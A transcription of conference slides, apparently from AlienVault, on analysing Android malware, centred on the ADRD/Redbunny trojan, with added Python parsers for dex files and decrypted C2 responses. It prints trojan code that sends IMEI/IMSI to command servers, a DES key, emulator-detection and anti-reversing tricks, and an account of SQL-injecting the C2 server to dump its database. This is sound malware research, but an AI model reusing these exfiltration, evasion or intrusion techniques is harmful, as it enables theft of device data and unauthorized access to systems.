8:30 PM - AlienVault

Transcription

Lost in translation
WTF is happening inside my Android Phone
Contents
Android System
Static Analysis
Dynamic Analysis
Reversing
Red Bunny
Conclusion
Android architecture
DALVIK VM
- Register-based virtual machine
- It uses its own bytecode, not Java bytecode.
- Run on a slow CPU with little RAM.
- Run on an operating system without swap space.
- Optimized for memory efficiency.
- Dex class file format.
Dex file format
header
string_ids
type_ids
proto_ids
field_ids
method_ids
class_defs
data
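As an added example (not from the slides), a minimal Python parser for the dex header_item that locates the sections listed above, plus a bounds check of each id table against the file size, which is the kind of check a reversing tool needs to survive a deliberately mangled dex. The sample header is constructed by build_header, not taken from a real apk.

```python
import struct

DEX_MAGIC = b"dex\n035\0"
HEADER_SIZE = 0x70
ENDIAN_CONSTANT = 0x12345678
# header_item fields after magic (8), checksum (4) and signature (20): twenty u4 values.
FIELDS = ("file_size", "header_size", "endian_tag", "link_size", "link_off", "map_off",
          "string_ids_size", "string_ids_off", "type_ids_size", "type_ids_off",
          "proto_ids_size", "proto_ids_off", "field_ids_size", "field_ids_off",
          "method_ids_size", "method_ids_off", "class_defs_size", "class_defs_off",
          "data_size", "data_off")
# Fixed entry size of each id table, used to bounds-check the sections.
ENTRY_SIZE = {"string_ids": 4, "type_ids": 4, "proto_ids": 12, "field_ids": 8,
              "method_ids": 8, "class_defs": 32}


def parse_header(blob):
    """Parse the dex header_item at the start of blob into a dict."""
    if len(blob) < HEADER_SIZE or blob[:8] != DEX_MAGIC:
        raise ValueError("not a dex 035 file")
    hdr = dict(zip(FIELDS, struct.unpack_from("<20I", blob, 32)))
    hdr["checksum"] = struct.unpack_from("<I", blob, 8)[0]
    hdr["signature"] = blob[12:32].hex()
    return hdr


def check_sections(hdr, file_len):
    """Return the list of layout problems; empty means the sections are consistent."""
    problems = []
    if hdr["endian_tag"] != ENDIAN_CONSTANT:
        problems.append("unexpected endian_tag 0x%08x" % hdr["endian_tag"])
    if hdr["file_size"] != file_len:
        problems.append("file_size %d != actual %d" % (hdr["file_size"], file_len))
    for name, entry in ENTRY_SIZE.items():
        size, off = hdr[name + "_size"], hdr[name + "_off"]
        end = off + size * entry
        if size and (off < HEADER_SIZE or end > file_len):
            problems.append("%s [%d, %d) lies outside the file" % (name, off, end))
    return problems


def build_header(**overrides):
    """Constructed sample: an otherwise empty dex header; overrides tweak any field."""
    fields = dict.fromkeys(FIELDS, 0)
    fields.update(file_size=HEADER_SIZE, header_size=HEADER_SIZE,
                  endian_tag=ENDIAN_CONSTANT, data_off=HEADER_SIZE)
    fields.update(overrides)
    body = struct.pack("<20I", *(fields[f] for f in FIELDS))
    return DEX_MAGIC + struct.pack("<I", 0) + bytes(20) + body
```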
Analysis Environment
Tools
Case-sensitive file system :D
Android SDK
Android NDK
Android source code
Eclipse
Apktool, Dex2jar, JD-GUI
Android Emulator
Example
Compiler: .java (source) -> .dex
Reversing: .dex / dexdump, dex2jar -> .java / jd-gui, .smali / baksmali
Anti-analysis
Examples:
- Easy: Use a.class and A.class as class names: the file will be hidden on case-insensitive file systems.
- Medium: Optimize/obfuscate the code with ProGuard.
- Hard: Modify bytecode to break reversing tools (be sure that it still runs on Dalvik).
E.g.: androguard-a1, after inserting the value type VALUE_ANNOTATION:
    if self.__value_type >= VALUE_SHORT :
        ...
    elif self.__value_type == VALUE_ARRAY :
        ...
    elif self.__value_type == VALUE_BYTE :
        ...
    elif self.__value_type == VALUE_NULL :
        ...
    elif self.__value_type == VALUE_BOOLEAN :
        ...
    else :
        raise("oops")
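An added example, not from the slides or from androguard: a decoder for Dalvik encoded_value items that covers every documented tag, VALUE_ANNOTATION included, so an unexpected tag yields an error with its offset rather than a bare "oops". Tag numbers and layout follow the dex format documentation; the inputs in the test are constructed byte strings.

```python
import struct
# Dalvik encoded_value tags (low 5 bits of the first byte); the high 3 bits are value_arg.
VALUE_BYTE, VALUE_SHORT, VALUE_CHAR, VALUE_INT, VALUE_LONG, VALUE_FLOAT, VALUE_DOUBLE = 0x00, 0x02, 0x03, 0x04, 0x06, 0x10, 0x11
VALUE_STRING, VALUE_TYPE, VALUE_FIELD, VALUE_METHOD, VALUE_ENUM = 0x17, 0x18, 0x19, 0x1A, 0x1B
VALUE_ARRAY, VALUE_ANNOTATION, VALUE_NULL, VALUE_BOOLEAN = 0x1C, 0x1D, 0x1E, 0x1F
SIGNED = (VALUE_BYTE, VALUE_SHORT, VALUE_INT, VALUE_LONG)
UNSIGNED = (VALUE_CHAR, VALUE_STRING, VALUE_TYPE, VALUE_FIELD, VALUE_METHOD, VALUE_ENUM)


def read_uleb128(buf, off):
    # Returns (value, next_offset) for the ULEB128 integer at buf[off].
    result, shift = 0, 0
    while True:
        b = buf[off]
        off += 1
        result |= (b & 0x7F) << shift
        if not b & 0x80:
            return result, off
        shift += 7


def decode_value(buf, off=0):
    # Decodes one encoded_value at buf[off]; returns (tag, python_value, next_offset).
    head = buf[off]
    tag, size = head & 0x1F, (head >> 5) + 1   # size = value_arg + 1 payload bytes
    off += 1
    if tag == VALUE_BOOLEAN:                    # value is value_arg itself, no payload
        return tag, bool(head >> 5), off
    if tag == VALUE_NULL:
        return tag, None, off
    if tag in SIGNED:                           # little-endian, sign-extended
        return tag, int.from_bytes(buf[off:off + size], "little", signed=True), off + size
    if tag in UNSIGNED:                         # zero-extended char or table index
        return tag, int.from_bytes(buf[off:off + size], "little"), off + size
    if tag in (VALUE_FLOAT, VALUE_DOUBLE):      # zero-extended to the right (low bytes)
        width, fmt = (4, "<f") if tag == VALUE_FLOAT else (8, "<d")
        return tag, struct.unpack(fmt, bytes(width - size) + buf[off:off + size])[0], off + size
    if tag == VALUE_ARRAY:                      # uleb128 count, then nested values
        count, off = read_uleb128(buf, off)
        items = []
        for _ in range(count):
            _, item, off = decode_value(buf, off)
            items.append(item)
        return tag, items, off
    if tag == VALUE_ANNOTATION:                 # the tag the androguard chain lacked
        type_idx, off = read_uleb128(buf, off)
        count, off = read_uleb128(buf, off)
        elements = {}
        for _ in range(count):
            name_idx, off = read_uleb128(buf, off)
            _, elements[name_idx], off = decode_value(buf, off)
        return tag, (type_idx, elements), off
    raise ValueError("reserved encoded_value tag 0x%02x at offset %d" % (tag, off - 1))
```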
Dynamic Analysis
Basic:
- Create an Android Virtual Device. -> $android (SDK)
- $emulator -port 5560 @virtual-device -tcpdump capture.pcap
- $adb install app.apk
- $adb shell monkey -v -p package.app 700
- $adb shell logcat -d && $adb shell logcat -b events -d (radio also)
- $adb shell '/data/busybox find / -type f -exec /data/busybox md5sum {} \;'
Make it more real
- Simulate phone events:
  Send SMS:
  $echo sms send +34656566789 test | nc localhost 5554
  D/AT ( 32): AT< 00200b914356566687f900001120720274404004e3f0380c
  Simulate calls:
  $echo gsm call +34656566789 | nc localhost 5554
  $echo gsm accept +34656566789 | nc localhost 5554
  $echo gsm cancel +34656566789 | nc localhost 5554
  Change GPS coordinates:
  $echo geo fix -82.411629 28.054553 | nc localhost 5554
Dynamic Analysis
Advanced:
- Create your own system image and modify the Java classes to log the program flow. Example: framework/base/core/java/android/os/Process.java
Compiling Android kernel modules
$git clone git://android.git.kernel.org/kernel/common
$git branch -a
$git checkout --track -b android-goldfish-2.6.29 origin/android-goldfish-2.6.29
$adb pull /proc/config.gz ./; gunzip config.gz; mv config .config
Edit and add CONFIG_MODULES=y (disabled by default on the emulator kernel)
$emulator -avd armv5y -kernel /tmp/zImage
System-Call Hooking
$grep sys_call_table System.map
Anti-VM
- Detecting the emulator is very easy:
  DEVICE_ID:
    String id = Settings.Secure.getString(this.getContentResolver(), Settings.Secure.ANDROID_ID);
    boolean emulator = TextUtils.isEmpty(id);
  Solution: change secure->android_id in data/data/com.android.providers.settings/databases/settings.db
  IMSI:
    TelephonyManager manager = (TelephonyManager) getSystemService(TELEPHONY_SERVICE);
    String imsi = manager.getSubscriberId(); // 00000... on the emulator
  Solution: patch the emulator binary (search for the +CGSN string) or the emulator source code (external/qemu/telephony/android_modem.c).
More Anti-VM
- LocationManager.NETWORK_PROVIDER -> IllegalArgumentException
- Detect ADB stuff: process, network, debug enabled...
- /proc/cpuinfo -> Hardware : Goldfish
- vibrator.vibrate(milliseconds) and use a SensorListener (sensor data doesn't change) (Thanks Ehooo)
- Qemu-specific detection (Google)
Solution:
Patch the emulator, Qemu, system hooking...
Alternatives to Android Emulator
- http://www.android-x86.org/ . Supports VMware
- Use a real phone... Slower
Attack Vectors
- Alternative markets, repacked applications.
- SMS, MMS vulnerabilities, Fuzzing!!!
- Wireless, Bluetooth drivers
- NFC
- System components: Webkit, sound library, Kernel.
Third party software
Source: http://android.git.kernel.org/
ADRD aka Redbunny
- "Security Alert 2011-02-14: New Android Trojan 'ADRD' Was Found in the Wild by Aegislab" (http://blog.aegislab.com/index.php?op=ViewArticle&articleId=75&blogId=1)
- "[…] Today, we found a new Android trojan, we call it "ADRD", which was not reported by any security vendors before. […]"
- Jaime Blasco and Pablo Rincón were working together, analyzing this malware on Feb 2, 2011:
  * Name: com.beautyfullivewallpaper
  * Date: Feb. 2, 2011, 1:49 p.m.
- Also known as HongTouTou
Detection
- Permission list:
  * INTERNET, WRITE_EXTERNAL_STORAGE, ACCESS_NETWORK_STATE, READ_PHONE_STATE, RECEIVE_BOOT_COMPLETED, MODIFY_PHONE_STATE, WRITE_APN_SETTINGS..
- Cipher module/library calls (DES):
  * init Ljavax/crypto/Cipher; Lcom/xxx/yyy/ddda; decrypt
- Function calls to retrieve the IMSI/IMEI codes:
  * IMEI: getDeviceId Lcom/xxx/yyy/MyService; onCreate
  * IMSI: getSubscriberId Lcom/xxx/yyy/MyService; onCreate
- HTTP Requests (GET and POST):
  * String str8 = "http://adrd.taxuan.net/index.aspx?im=" + (String)localObject;
  * adrd.xiaxiab.com POST /index.aspx?im=82a68757db94a88dace3e401a5721b33af757f73d68485eab1244e5dace3ed65910991f4dbd438af
Detection
- Sends HTTP requests through a proxy:
  * HttpHost localHttpHost = new HttpHost("10.0.0.172", 80, "http");
  * HttpParams localHttpParams = localDefaultHttpClient.getParams().setParameter("http.route.defaultproxy", localHttpHost);
- Services:
  * com.xxx.yyy.MyService
  * .beauty.Beauty
- Intents:
  * android.intent.action.BOOT_COMPLETED -> Boots at system startup
  * android.intent.action.PHONE_STATE
  * android.net.conn.CONNECTIVITY_CHANGE
Analysis I
Service module (MyService):
1. Sets the preferred APN
   - Runs every 12 hours
   - Looks for specific APN networks: "CMWAP" || "UNIWAP"
2. Sets a proxy for GET/POST and specially crafted HTTP headers (UA, MIME types)
3. Cipher data module:
   public static String encrypt/decrypt
   Cipher localCipher = Cipher.getInstance("DES/CBC/PKCS5Padding");
4. Sends data to adrd.taxuan.net/index.aspx?im=%s:
   + IMEI
   + IMSI
   + Netway (preferred APN)
   + iversion
   + oversion
5. Sends log data to the control servers, in a loop:
   + Decrypt response
   + Switch(cmd) It depends on the
     + 0 Do nothing
     + 1 adad.StartGo()
     + 2 ParseO()
     + 3 UpdateHelper()
6. Command handlers:
   - adad.StartGo(): sends http://adrd.xiaxiab.com/pic.aspx?im= +encrypt(IMEI+IMSI
     Parses the big list of urls/referers: B#1#963a_w1|http://59.173.12.105/g/g.ashx?w=963a_w1
     BBBB.Go() -> retrieves search lists of wap.baidu.com
     FixUrls(): sends random requests adding BAIDU_WISE_UID and HTTP_HEADERS.
   - UpdateHelper(): installs the update apk
   - ParseO(): parses the server response (number, flags, tags..):
     T213607170863|12345|+你好-10086+是吗abc可能-597|回[ 认'
Analysis II
- Following the encryption routines, the DES key is found…: this.kk = "48734154";
  * UpdateHelper class:
    public class UpdateHelper
    {
        private static String savefilepath = "/myupdate.apk";
        private Context ct;
        private int netway;
        // ...
    }
  * Benefits from visits to the content (Baidu) and bandwidth consumption (China Mobile && Unicom) and also SMS charges.
- Server URLs (there are more):
  http://adrd.xiaxiab.com/pic.aspx?im=CIPHERED_DATA
  http://adrd.taxuan.net/index.aspx?im=CIPHERED_DATA
- We want to know more!!
Control Servers
- adrd.xiaxiab.com from a bird's-eye view:
  * Microsoft-IIS/6.0
  * Debug enabled (displaying .NET errors and backtraces)
  * Hidden paths to the .NET/aspx application
  * ALL is Chinese! (WTF!?!"·$%&/(?)
- Possible attack vectors:
  * HTTP functions + DES key + pyDes = "legal" HTTP requests (at least for the adrd server)
Control Servers
- First results:
  * Exceptions in Chinese. Google Translate is your friend
  * Errors at .NET (it didn't generate any html list/table, or view to use for data displaying)
  * We got a successful SQL injection after the last ciphered parameter :D)
  * User without admin privileges.
  * Permissions to run backups + shared resources = Timeout
  * Other possibilities:
    + 1: Create a temporary db, with just one table each time, dump paginated rows and run backups. Problem: complex to do and complex to rebuild the original DB (also the language didn't help)
    + 2: Try to get a shell in any possible way. Problem: time, exploits, noise (our current attacks were hidden by DES in the http logs, and it's not usual to log all the db queries for performance reasons).
Database Information
- The whole schema obtained: list of tables, fields, types, stored procedures
- IMEI/IMSI list (at least some of them), logs, keywords, Baidu accounts
- The main stored procedure affected by the SQL injection retrieves the URL of myupdate.apk, which points to adrd.xiaxiab.com/down.aspx !
  * Parameters:
    @imei varchar(50), @imsi varchar(50), @ip varchar(128), @logs varchar(256), @netwap int
  * Stored procedure:
    --if (@netwap=2)
    select 'T-1|T11'
    --select 'T3http://adrd.xiaxiab.com/down.aspx'
    --select 'T213607170863|12345|+你好-10086+是吗abc可能-597|回[ 认'
    --else
    --select 'T013607170863'
  * It looks like they were considering the netwap (based on the mobile operator) as a criterion to send commands
  * TX (where X seems to be a command type)
  * 13607170863 is a phone number located in Wuhan
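An added example (not the authors' code) that decodes the T-prefixed responses quoted in the stored procedure and in ParseO() into the command numbers of the switch(cmd) loop, the way an analyst would triage decrypted C2 traffic. It assumes the command is the single digit after T, that '|' separates the fields of a ParseO payload, and that each tag is prefixed with '+' or '-'; the sample responses are the ones shown above.

```python
import re

# Handler each command number dispatches to, per the decompiled switch(cmd).
HANDLERS = {0: "do nothing", 1: "adad.StartGo()", 2: "ParseO()", 3: "UpdateHelper()"}
# Assumption: the command is the single (optionally negative) digit after 'T';
# the rest of the string is the payload (the number in 'T2136...' would otherwise be eaten).
RESPONSE_RE = re.compile(r"\AT(-?\d)(.*)\Z", re.S)
# Assumption: in a ParseO payload '|' separates fields and every tag starts with '+' or '-'.
TAG_RE = re.compile(r"([+-])([^+-]+)")


def parse_response(text):
    """Decode one decrypted control-server response of the form T<cmd><payload>."""
    m = RESPONSE_RE.match(text)
    if not m:
        raise ValueError("not a T-prefixed command: %r" % text[:16])
    cmd, payload = int(m.group(1)), m.group(2)
    out = {"cmd": cmd, "handler": HANDLERS.get(cmd, "unknown"), "payload": payload}
    if cmd == 2:                                   # ParseO(): number, flags, tags..
        fields = payload.split("|")
        out["number"] = fields[0]
        out["flags"] = fields[1] if len(fields) > 1 else None
        out["tags"] = [TAG_RE.findall(f) for f in fields[2:]]
    elif cmd == 3:                                 # UpdateHelper(): where myupdate.apk lives
        out["update_url"] = payload
    return out
```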
Database Schema
t_baiduHourPercent: autoid, mHour, mPercent
t_baidukeyword: keyword, viewcount
t_baidukeywordflash: keyword
t_baiduOrtherKey: keyword, viewcount
t_baidupwd: id, way, username, pwd
t_baiduwayname: way, wayname
t_keywordResult: id, keyword, link, head, flag
t_androidtemplog: id, imsi, way, result, createtime
t_keywordResult20100601: id, keyword, link, head, flag
t_keywordResult20101108: id, keyword, link, head, flag
t_baiduHourPercent20101012: autoid, mHour, mPercent
t_androidtemplog_backup: id, imsi, way, result, createtime
t_androidtemperrlog: id, compresslog, decompresslog, createtime
t_androidtemplog_backup201101: id, imsi, way, result, createtime
t_android访问记录: id, imei, imsi, logs, ip, createtime, netway
t_android日点击量表: 日期, 用户数, 点击量, 次数, createtime
t_baidutask: maxmdncount, mdncount, percent, f3percent, createtime, userid
t_点击量切换计 表: way, maxClick, minClick, leaveTotalClick, leaveEffectClick
t_有效 键字_wap_20100323: keyword, createtime
t_有效 键字_wap_20100722备份: keyword, createtime
t_标准比对表: myear, mmonth, mday, mhour, total
t_点击量切换标志表: way, flag
t_任务表: keyword, flag
t_任务表_wap: keyword, flag
t_任务表_wap_back无效: keyword, flag
t_任务表_wap_back有效: keyword, flag
t_任务方式: flag
t_无效 键字: keyword, createtime
t_无效 键字_wap: keyword, createtime
t_有效 键字: keyword, createtime
t_有效 键字_wap: keyword, createtime
Myupdate.apk
- It uses the main package of the ADRD family xxx.yyy.
- The update has other permissions: WRITE_SMS, READ_SMS, RECEIVE_SMS, SEND_SMS..
- Looks like a Google reader
- It adds a local sqlite DB (keyword storage):
  go_g1_sms: id, keyword, type, flag
  go_g2_sms: id, keyword, keyword2
- SMSObserver:
  * Replaces keywords in SMSs.
  * Sends SMS!
Samples
Package name                            Md5                               Adrd Ver        IVer
com.beautyfullivewallpaper              4556a687a2845bf4dfac62c594938cf3  adrd.zt.cw.1    6
com.yodesoft.yohandcar                  6783cee889fa64df68af58a56ff6e362  adrd.zt.2       6
com.binaryloft.live.winter              aa5216da617839e818d83d8185da42b0  adrd.zt.jtj.2   6
com.magicwach.rdefense                  839c37f3a2c8d31561d28f619a2a712e  adrd.zt.cw.3    6
com.tat.livewallpaper.dandelion         5192ad05597e7a148f642be43f6441f6  adrd.zt.cw.4    6
com.classicnerds.livewallpaper.HK       b72724d8fc0f633194dcc3bd28eec026  adrd.zt.cw.5    7
fishnoodle.night_city                   a01ba26a34e55f71873782348ff5e074  adrd.zt.dxm.6   7
com.appspot.swisscodemonkeys.steam      cdfca19bf212adf3292e4fe677fe46a6  adrd.zt.cw.7    7
kr.mobilesoft.yxplayer                  e3cc6c7af0d83fe322116254c01cf720  adrd.zt.cw.8    7
com.labgency.wallpapers.waves           7d764347a0b0c9d11160d7a7684bf02b  adrd.zt.dxm.8   7
com.laucass.andromax                    627f41c8f8e7ab007641c4a0c1d8ce1b  adrd.zt.cw.9    7
com.digitalchocolate.androidrollergapp  71c0a67daa544450d7c620a48cc059b0  drd.zt.cw.12    7
proscio.wallpaper.shamroc               e09782d35d72a769dc7454adb6d8e2e9  adrd.zt.cw.15   7
com.tt.yy                               f2596f8f3c52381318f62d1ab161c284  ??              ??
Infections
(Figure: geolocation of infections)
Infections
(Figure: infections by operator)
+20K different IMSIs
Other affected operators:
Far EasTone
Peoples Telephone Company
Hutchison 3G
PCCW Mobile Sunday
Hong Kong Telecom
SmarTone Mobile
Thank You
Questions?
@jaimeblascob
@PabloForThePPL